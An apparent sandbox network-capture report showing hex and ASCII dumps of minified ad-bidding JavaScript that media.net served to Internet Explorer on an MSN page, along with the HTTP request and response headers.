                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC369INData Raw: 7c 7c 6e 75 6c 6c 7d 2c 74 68 69 73 2e 67 65 74 57 69 6e 6e 69 6e 67 42 69 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 69 66 28 69 21 3d 3d 21 30 26 26 46 28 29 2c 30 3d 3d 3d 63 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 74 2e 69 73 57 69 6e 6e 65 72 44 65 63 3d 21 30 2c 65 3f 5b 6e 75 6c 6c 2c 6e 75 6c 6c 5d 3a 6e 75 6c 6c 3b 69 66 28 65 74 2e 69 73 57 69 6e 6e 65 72 44 65 63 29 72 65 74 75 72 6e 20 57 28 65 29 3b 69 66 28 53 28 29 2c 4d 28 29 2c 63 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 76 61 72 20 6e 3d 63 74 5b 30 5d 3b 77 28 6e 29 26 26 28 6e 2e 73 65 74 28 22 69 77 62 22 2c 22 31 22 29 2c 65 74 2e 68 61 73 41 6e 79 57 69 6e 42 69 64 3d 21 30 29 7d 76 61 72 20 72 3d 57 28 65 29 2c 73 3d 74 2e 51 65 28 72 29 3f 72 5b 30 5d 3a 72 3b 72 65 74
                                                                                                                                                                                                                  Data Ascii: ||null},this.getWinningBid=function(e,i){if(i!==!0&&F(),0===ct.length)return et.isWinnerDec=!0,e?[null,null]:null;if(et.isWinnerDec)return W(e);if(S(),M(),ct.length>0){var n=ct[0];w(n)&&(n.set("iwb","1"),et.hasAnyWinBid=!0)}var r=W(e),s=t.Qe(r)?r[0]:r;ret
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC385INData Raw: 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 69 66 28 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 61 62 75 63 6b 22 29 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 61 62 75 63 6b 22 29 2c 72 3d 6e 65 77 20 44 61 74 65 28 77 69 6e 64 6f 77 2e 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 63 62 65 78 70 22 29 29 3b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 3e 72 2e 67 65 74 54 69 6d 65 28 29 3f 6e 75 6c 6c 3a 74 2e 57 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3d 3d 3d 6e 29 72 65 74 75 72 6e 20 65 7d 29 7d 72 65
                                                                                                                                                                                                                  Data Ascii: function m(e){if(window.sessionStorage.getItem("cabuck")){var n=window.sessionStorage.getItem("cabuck"),r=new Date(window.sessionStorage.getItem("cbexp"));return(new Date).getTime()>r.getTime()?null:t.W(e,function(e){if(JSON.stringify(e)===n)return e})}re
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC417INData Raw: 28 29 29 2c 6e 2e 70 75 73 68 28 75 29 7d 7d 2c 74 68 69 73 2e 67 65 74 42 75 69 6c 64 42 69 64 44 61 74 61 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 48 28 69 2e 62 75 69 6c 64 42 69 64 44 61 74 61 2c 5b 69 2e 68 61 6e 64 6c 65 42 69 64 73 46 6f 72 41 75 63 74 69 6f 6e 5d 29 7d 2c 74 68 69 73 2e 62 75 69 6c 64 42 69 64 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 64 3d 65 2e 41 5a 28 29 2c 61 3d 30 2c 73 3d 6e 2e 6c 65 6e 67 74 68 3b 61 3c 73 3b 61 2b 2b 29 7b 76 61 72 20 72 3d 6e 5b 61 5d 3b 74 28 69 2e 67 65 74 44 65 66 61 75 6c 74 42 69 64 46 6f 72 50 6c 61 63 65 6d 65 6e 74 28 72 2c 64 29 2c 72 2c 61 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 2d 31 29 7d 6e 3d 5b 5d 7d 2c 74 68 69 73 2e
                                                                                                                                                                                                                  Data Ascii: ()),n.push(u)}},this.getBuildBidDataCallback=function(){return e.H(i.buildBidData,[i.handleBidsForAuction])},this.buildBidData=function(t){for(var d=e.AZ(),a=0,s=n.length;a<s;a++){var r=n[a];t(i.getDefaultBidForPlacement(r,d),r,a===n.length-1)}n=[]},this.
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC433INData Raw: 28 6f 29 7b 76 61 72 20 73 3d 6f 2e 67 65 74 28 22 73 7a 22 29 3b 65 2e 5a 54 28 73 29 26 26 28 72 2e 73 69 7a 65 73 2e 70 75 73 68 28 6f 2e 67 65 74 28 22 73 7a 22 29 29 2c 72 2e 65 70 63 2e 70 75 73 68 28 69 2e 67 65 74 45 78 74 65 72 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 43 6f 64 65 28 6f 2c 74 29 29 29 7d 29 2c 72 29 3a 72 7d 2c 74 68 69 73 2e 67 65 74 45 78 74 65 72 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 43 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 22 65 70 63 22 29 7c 7c 74 2e 67 65 74 28 22 63 72 69 64 22 29 7d 2c 74 68 69 73 2e 70 61 72 73 65 45 61 63 68 50 72 6f 76 69 64 65 72 52 65 73 70 6f 6e 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 29 7b 76 61 72 20 73 3d 74 2e 67 65 74 50 72 6f 76 69 64
                                                                                                                                                                                                                  Data Ascii: (o){var s=o.get("sz");e.ZT(s)&&(r.sizes.push(o.get("sz")),r.epc.push(i.getExternalPlacementCode(o,t)))}),r):r},this.getExternalPlacementCode=function(e,t){return e.get("epc")||t.get("crid")},this.parseEachProviderResponse=function(t,r,o){var s=t.getProvid
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC465INData Raw: 73 2e 73 65 6f 3f 73 65 74 54 69 6d 65 6f 75 74 28 65 2e 48 28 64 2e 69 6e 69 74 2c 5b 5d 2c 64 29 2c 30 29 3a 64 2e 69 6e 69 74 28 29 7d 29 3b 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 65 72 72 6f 72 20 3d 20 65 72 72 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 63 61 74 63 68 43 6f 6e 73 74 61 6e 74 73 20 3d 20 7b 22 6e 61 6d 65 22 3a 22 68 62 43 4d 42 69 64 65 78 63 68 61 6e 67 65 22 2c 22 74 79 70 65 22 3a 22 48 42 2d 43 4d 22 2c 22 73 76 72 22 3a 22 32 30 32 31 31 31 31 30 31 33 5f 31 37 30 22 2c 22 73 65 72 76 6e 61 6d 65 22 3a 22 68 62 63 6d 5f 6e 61 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 62 43 4d 42 69 64 65 78 63 68 61 6e 67 65 20 65 6e 63 6f 75 6e 74
                                                                                                                                                                                                                  Data Ascii: s.seo?setTimeout(e.H(d.init,[],d),0):d.init()});} catch (err) { window.hbCMBidxc.error = err; window.hbCMBidxc.catchConstants = {"name":"hbCMBidexchange","type":"HB-CM","svr":"2021111013_170","servname":"hbcm_na","message":"hbCMBidexchange encount
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC481INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 69 3b 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 64 69 76 49 64 29 26 26 65 2e 73 6c 6f 74 49 64 26 26 28 28 74 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 69 66 72 61 6d 65 49 64 29 29 26 26 28 74 2e 77 69 64 74 68 3d 65 2e 77 69 64 74 68 2c 74 2e 68 65 69 67 68 74 3d 65 2e 68 65 69 67 68 74 29 2c 69 3d 67 65 74 53 69 7a 65 41 72 72 61 79 49 6e 49 6e 74 28 65 2e 73 69 7a 65 4c 69 73 74 2c 65 2e 77 69 64 74 68 2c 65 2e 68 65 69 67 68 74 29 2c 77 69 6e 64 6f 77 2e 6d 65 64 69 61 6e 65 74 5f 74 61 67 69 64 3d 65 2e 74 61 67 69 64 2c 77 69 6e 64 6f 77 2e 6d 65 64 69 61 6e 65 74 5f 64 66 70 56
                                                                                                                                                                                                                  Data Ascii: =function(e){var t,i;!document.getElementById(e.divId)&&e.slotId&&((t=window.parent.document.getElementById(iframeId))&&(t.width=e.width,t.height=e.height),i=getSizeArrayInInt(e.sizeList,e.width,e.height),window.medianet_tagid=e.tagid,window.medianet_dfpV
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC497INData Raw: 61 6c 6c 3a 67 2c 67 65 74 52 61 6e 64 6f 6d 3a 77 2c 69 73 50 65 72 63 65 6e 74 41 70 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 28 31 2c 31 30 30 29 3c 3d 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 7d 2c 67 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 41 73 41 72 72 61 79 3a 61 2e 75 72 75 2e 67 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 41 73 41 72 72 61 79 2c 47 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 3a 61 2e 75 72 75 2e 47 65 74 50 61 72 61 6d 56 61 6c 75 65 46 72 6f 6d 55 72 6c 2c 63 68 65 63 6b 55 72 6c 44 65 63 6f 64 69 6e 67 45 6e 63 6f 64 69 6e 67 3a 61 2e 75 72 75 2e 63 68 65 63 6b 55 72 6c 44 65 63 6f 64 69 6e 67 45 6e 63 6f 64 69 6e 67 2c 65 76 65 6e 74 4c 69 62 3a 61 2e 65 76
                                                                                                                                                                                                                  Data Ascii: all:g,getRandom:w,isPercentApp:function(e){return w(1,100)<=parseInt(e,10)},getParamValueFromUrlAsArray:a.uru.getParamValueFromUrlAsArray,GetParamValueFromUrl:a.uru.GetParamValueFromUrl,checkUrlDecodingEncoding:a.uru.checkUrlDecodingEncoding,eventLib:a.ev
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC505INData Raw: 26 26 28 69 2b 3d 5b 22 26 22 2c 22 76 67 64 5f 22 2b 74 2c 22 3d 22 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 5b 74 5d 29 5d 2e 6a 6f 69 6e 28 22 22 29 29 3b 72 65 74 75 72 6e 20 69 7d 28 29 2c 67 3d 6f 2e 5f 6d 4e 2e 5f 68 74 68 43 68 6b 55 52 4c 2b 72 3b 69 66 28 5f 6d 4e 2e 5f 74 72 75 6e 4c 6f 67 55 72 6c 26 26 28 67 3d 73 2e 74 72 75 6e 63 61 74 65 55 72 6c 28 67 2c 5f 6d 4e 2e 5f 74 72 75 6e 4c 6f 67 55 72 6c 29 29 2c 65 3d 69 2c 21 73 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 6f 2e 5f 6d 4e 2e 5f 4c 31 50 67 45 78 2c 65 2e 67 65 74 45 6e 74 69 74 79 28 22 63 72 69 64 22 29 29 26 26 21 73 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 6f 2e 5f 6d 4e 2e 5f 4c 31 50 67 45 78 2c 65 2e 67 65 74 45 6e 74 69 74 79 28 22
                                                                                                                                                                                                                  Data Ascii: &&(i+=["&","vgd_"+t,"=",encodeURIComponent(c[t])].join(""));return i}(),g=o._mN._hthChkURL+r;if(_mN._trunLogUrl&&(g=s.truncateUrl(g,_mN._trunLogUrl)),e=i,!s.checkItemExists(o._mN._L1PgEx,e.getEntity("crid"))&&!s.checkItemExists(o._mN._L1PgEx,e.getEntity("
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC545INData Raw: 2e 67 65 74 49 74 65 6d 73 46 72 6f 6d 4d 61 63 72 6f 73 28 22 61 64 74 32 22 29 29 2c 4d 28 22 62 63 61 74 22 2c 43 28 5f 65 2e 5f 62 64 61 74 61 2c 22 62 63 61 74 22 29 29 2c 4d 28 22 77 65 62 5f 76 69 65 77 22 2c 7b 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 69 66 28 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 77 76 29 22 29 7c 7c 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 41 6e 64 72 6f 69 64 20 34 2e 22 29 26 26 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 28 65 2c 22 56 65 72 73 69 6f 6e 2f 22 29 29 72 65 74 75 72 6e 22 41 4e 44 52 4f 49 44 5f 57 45 42 56 49 45 57 22 3b 69 66 28 2f 69 50 68 6f 6e 65 7c 69 50 61
                                                                                                                                                                                                                  Data Ascii: .getItemsFromMacros("adt2")),M("bcat",C(_e._bdata,"bcat")),M("web_view",{value:function(){var e=navigator.userAgent;if(Ee.checkItemExists(e,"wv)")||Ee.checkItemExists(e,"Android 4.")&&Ee.checkItemExists(e,"Version/"))return"ANDROID_WEBVIEW";if(/iPhone|iPa
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC553INData Raw: 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 49 6e 41 72 72 61 79 28 65 2c 22 72 65 6d 51 75 6f 74 65 22 29 26 26 28 74 3d 74 2e 72 65 70 6c 61 63 65 28 22 27 22 2c 22 22 29 29 2c 45 65 2e 63 68 65 63 6b 49 74 65 6d 45 78 69 73 74 73 49 6e 41 72 72 61 79 28 65 2c 22 72 65 6d 6f 76 65 41 6c 6c 22 29 26 26 28 74 3d 22 22 29 2c 74 29 29 2c 6b 65 28 46 28 22 63 72 65 66 22 29 29 26 26 72 65 28 22 63 72 65 66 22 2c 43 65 28 46 28 22 63 72 65 66 22 29 29 29 2c 6b 65 28 46 28 22 77 65 62 5f 76 69 65 77 22 29 29 26 26 72 65 28 22 77 65 62 5f 76 69 65 77 22 2c 46 28 22 77 65 62 5f 76 69 65 77 22 29 29 2c 22 54 42 35 35 4a 35 52 22 3d 3d 3d 5f 65 2e 5f 74 70 69 64 26 26 44 28 22 6b 77 72 66 22 2c 46 28 22 65 72 65 71 75 72 6c 22 29 2c 21 30 29 2c 21 6b 65 28 5f 65 2e
                                                                                                                                                                                                                  Data Ascii: heckItemExistsInArray(e,"remQuote")&&(t=t.replace("'","")),Ee.checkItemExistsInArray(e,"removeAll")&&(t=""),t)),ke(F("cref"))&&re("cref",Ce(F("cref"))),ke(F("web_view"))&&re("web_view",F("web_view")),"TB55J5R"===_e._tpid&&D("kwrf",F("erequrl"),!0),!ke(_e.
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC569INData Raw: 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 5b 73 5d 3d 61 2e 69 73 41 70 70 6c 69 63 61 62 6c 65 28 29 3f 22 31 22 3a 22 30 22 2c 65 7d 2c 74 68 69 73 2e 67 65 74 4c 44 50 46 6c 61 67 46 6f 72 48 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 74 68 69 73 2e 67 65 74 4d 61 63 72 6f 73 46 6f 72 48 42 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 67 64 3d 61 2e 69 73 41 70 70 6c 69 63 61 62 6c 65 28 29 2c 65 7d 2c 74 68 69 73 2e 63 61 6c 6c 48 42 41 70 69 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 7d 2c 74 3d 66 2e 67 65 74 52 65 71 75 69 72 65 4d 6f 64 75 6c 65 28 22 61 64 61 70 74 65 72 2d 63 6f 6e 73 74 61 6e 74 73 22 29 3b 72 65 74 75 72 6e 20 66 2e 69 73 53 65 74 28
                                                                                                                                                                                                                  Data Ascii: tion(){var e={};return e[s]=a.isApplicable()?"1":"0",e},this.getLDPFlagForHB=function(){},this.getMacrosForHB=function(){var e={};return e.gd=a.isApplicable(),e},this.callHBApis=function(){var e={},t=f.getRequireModule("adapter-constants");return f.isSet(
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC593INData Raw: 22 29 7d 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 7b 7d 3b 74 72 79 7b 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 64 61 74 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 6e 2e 64 61 74 61 29 3a 6e 2e 64 61 74 61 7d 63 61 74 63 68 28 6e 29 7b 7d 76 61 72 20 69 3d 74 2e 5f 5f 74 63 66 61 70 69 52 65 74 75 72 6e 3b 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 5b 69 2e 63 61 6c 6c 49 64 5d 26 26 63 5b 69 2e 63 61 6c 6c 49 64 5d 28 69 2e 72 65 74 75 72 6e 56 61 6c 75 65 2c 69 2e 73 75 63 63 65 73 73 29 7d 2c 21 31 29 7d 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66
                                                                                                                                                                                                                  Data Ascii: ")},window.addEventListener("message",function(n){var t={};try{t="string"==typeof n.data?JSON.parse(n.data):n.data}catch(n){}var i=t.__tcfapiReturn;i&&"function"==typeof c[i.callId]&&c[i.callId](i.returnValue,i.success)},!1)}!function(){var n=function(){f
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC617INData Raw: 2c 69 2e 64 61 74 61 2c 6f 2c 72 2e 67 65 74 56 69 73 69 74 49 64 28 29 29 7d 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 73 68 6f 75 6c 64 4f 76 65 72 72 69 64 65 4c 6f 67 46 75 6e 63 74 69 6f 6e 3f 69 2e 73 68 6f 75 6c 64 4f 76 65 72 72 69 64 65 4c 6f 67 46 75 6e 63 74 69 6f 6e 3a 22 69 66 72 22 3d 3d 6e 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 74 3d 67 28 74 3d 72 29 29 2e 76 67 64 5f 69 66 69 6d 70 3d 31 2c 74 3b 76 61 72 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 28 72 29 7d 2c 63 2e 74 72 69 67 67 65 72 41 64 54 61 67 45 76 65 6e 74 28 72 2e 67 65 74 45 6e 74 69 74 79 28 22 76 69 22 29 2c 22 56 49 4d 50 3a 3a 69 6e 69 74 4f 62 73 65 72 76 65 72 22 2c 21 30 2c 7b 74 61 72 67 65 74 45 6c
                                                                                                                                                                                                                  Data Ascii: ,i.data,o,r.getVisitId())}:"function"==typeof i.shouldOverrideLogFunction?i.shouldOverrideLogFunction:"ifr"==n?function(){return(t=g(t=r)).vgd_ifimp=1,t;var t}:function(){return g(r)},c.triggerAdTagEvent(r.getEntity("vi"),"VIMP::initObserver",!0,{targetEl
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC625INData Raw: 2e 41 44 56 42 49 44 5f 4f 42 4a 45 43 54 5d 5b 61 2e 41 50 49 35 5f 47 45 54 5f 41 44 58 5f 50 52 45 44 49 43 54 49 4f 4e 5d 29 26 26 28 6e 3d 73 5b 61 2e 41 44 56 42 49 44 5f 4f 42 4a 45 43 54 5d 5b 61 2e 41 50 49 35 5f 47 45 54 5f 41 44 58 5f 50 52 45 44 49 43 54 49 4f 4e 5d 28 41 2e 67 65 74 48 42 43 72 65 61 74 69 76 65 49 64 28 74 29 2c 69 2c 65 2c 49 5b 74 5d 29 29 2c 65 3d 6e 2c 63 2e 69 73 53 65 74 28 65 29 26 26 63 2e 69 73 53 65 74 28 65 5b 75 2e 42 49 44 5d 29 26 26 63 2e 69 73 46 75 6e 63 74 69 6f 6e 28 65 5b 75 2e 52 45 50 4f 52 54 5f 57 49 4e 5f 4f 52 5f 4c 4f 53 53 5f 43 41 4c 4c 42 41 43 4b 5d 29 3f 28 5f 28 5b 22 47 6f 74 20 48 62 2d 41 64 78 20 42 69 64 20 50 72 65 64 69 63 74 69 6f 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 77 69 74
                                                                                                                                                                                                                  Data Ascii: .ADVBID_OBJECT][a.API5_GET_ADX_PREDICTION])&&(n=s[a.ADVBID_OBJECT][a.API5_GET_ADX_PREDICTION](A.getHBCreativeId(t),i,e,I[t])),e=n,c.isSet(e)&&c.isSet(e[u.BID])&&c.isFunction(e[u.REPORT_WIN_OR_LOSS_CALLBACK])?(_(["Got Hb-Adx Bid Prediction successfully wit
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC641INData Raw: 59 21 42 20 61 73 73 75 6d 65 64 20 77 69 6e 6e 65 72 20 66 6f 72 20 72 65 61 73 6f 6e 3a 20 22 2b 65 2b 22 20 61 6e 64 20 62 69 64 64 65 72 20 69 64 3a 20 22 2b 69 2c 6e 2e 63 72 69 64 29 2c 74 5b 6b 2e 50 52 4f 56 49 44 45 52 5f 49 44 5d 3d 69 2c 74 5b 6b 2e 53 49 5a 45 5d 3d 6f 5b 57 2e 52 54 42 5f 53 49 5a 45 5d 3b 69 3d 6f 2e 72 70 3b 72 65 74 75 72 6e 20 65 21 3d 5a 2e 45 4d 50 54 59 5f 42 49 44 26 26 65 21 3d 5a 2e 4e 4f 5f 42 49 44 7c 7c 28 69 3d 22 30 2e 30 30 22 29 2c 74 5b 6b 2e 42 49 44 5d 3d 69 2c 74 5b 6b 2e 47 4f 4f 47 4c 45 5f 42 49 44 5d 3d 69 2c 74 5b 6b 2e 4e 4f 42 49 44 5f 52 45 41 53 4f 4e 5d 3d 65 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 29 7b 76 61 72 20 65 2c 69 2c 64 3b 72 65 74 75 72 6e 21 30 3d 3d 3d 74 5b 6b 2e 4e 4f 42 49
                                                                                                                                                                                                                  Data Ascii: Y!B assumed winner for reason: "+e+" and bidder id: "+i,n.crid),t[k.PROVIDER_ID]=i,t[k.SIZE]=o[W.RTB_SIZE];i=o.rp;return e!=Z.EMPTY_BID&&e!=Z.NO_BID||(i="0.00"),t[k.BID]=i,t[k.GOOGLE_BID]=i,t[k.NOBID_REASON]=e,t}function v(t){var e,i,d;return!0===t[k.NOBI
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC665INData Raw: 61 72 20 65 3d 22 22 2c 72 3d 74 2e 67 65 74 45 6e 74 69 74 79 28 22 72 65 71 75 72 6c 22 2c 21 30 29 2c 65 3d 63 2e 69 73 49 6e 49 46 72 61 6d 65 43 61 6c 6c 28 29 26 26 21 63 2e 69 73 50 61 72 65 6e 74 41 63 63 65 73 73 69 62 6c 65 28 29 3f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 74 3d 63 2e 67 65 74 54 6f 70 6d 6f 73 74 41 63 63 65 73 73 69 62 6c 65 57 69 6e 64 6f 77 28 29 7c 7c 21 31 2c 65 3d 74 26 26 74 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 28 29 2c 72 3d 65 26 26 65 2e 6c 65 6e 67 74 68 3f 65 5b 30 5d 2e 6e 61 6d 65 3a 76 6f 69 64 20 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 22 22 7d 72 65 74 75 72 6e 20 63 2e 69 73 53 74 72 69 6e 67 53 65 74
                                                                                                                                                                                                                  Data Ascii: ar e="",r=t.getEntity("requrl",!0),e=c.isInIFrameCall()&&!c.isParentAccessible()?r:function(){try{var t=c.getTopmostAccessibleWindow()||!1,e=t&&t.performance&&t.performance.getEntries(),r=e&&e.length?e[0].name:void 0}catch(t){return""}return c.isStringSet
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC689INData Raw: 6e 74 69 74 79 28 22 6e 6d 6f 76 6c 22 29 7c 7c 74 2e 67 65 74 45 6e 74 69 74 79 28 22 69 6e 73 6c 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 72 2c 73 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 2c 6e 3b 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 65 3d 74 2c 69 3d 72 2c 6e 3d 73 2c 6c 2e 61 64 64 54 6f 44 65 6c 61 79 65 64 45 76 65 6e 74 51 75 65 75 65 28 22 63 61 6c 6c 73 65 74 74 69 6e 67 73 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 31 21 3d 3d 65 2e 67 65 74 45 6e 74 69 74 79 28 22 65 78 74 65 72 6e 61 6c 50 72 6f 76 53 68 6f 77 6e 22 29 26 26 28 79 28 65 29 3f 28 65 2e 61 64 64 45 6e 74 69 74 79 28 22 68 74 6d 6c 73 72 63 22 2c 22 31 22 29 2c 74 3d 75 28 65 2c 69 2c 21 30 29 2c 61 2e 72
                                                                                                                                                                                                                  Data Ascii: ntity("nmovl")||t.getEntity("insl"))}function m(t,r,s){var o=function(){var e,i,n;o=function(){},e=t,i=r,n=s,l.addToDelayedEventQueue("callsettings",n,function(){var t;1!==e.getEntity("externalProvShown")&&(y(e)?(e.addEntity("htmlsrc","1"),t=u(e,i,!0),a.r


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  1192.168.2.64978723.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC0OUTGET /medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  If-None-Match: "e68781cdaae1574dce2fccfea5cb29e3"
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC17INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 412168
                                                                                                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                  x-mnt-h: 10-4
                                                                                                                                                                                                                  X-MNT-W: 8-34
                                                                                                                                                                                                                  ETag: "db541272bc5fe3e5b08680b778805039"
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  x-mnet-hli: E
                                                                                                                                                                                                                  Cache-Control: max-age=300
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:47:35 GMT
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:35 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC17INData Raw: 20 20 20 20
                                                                                                                                                                                                                  Data Ascii:
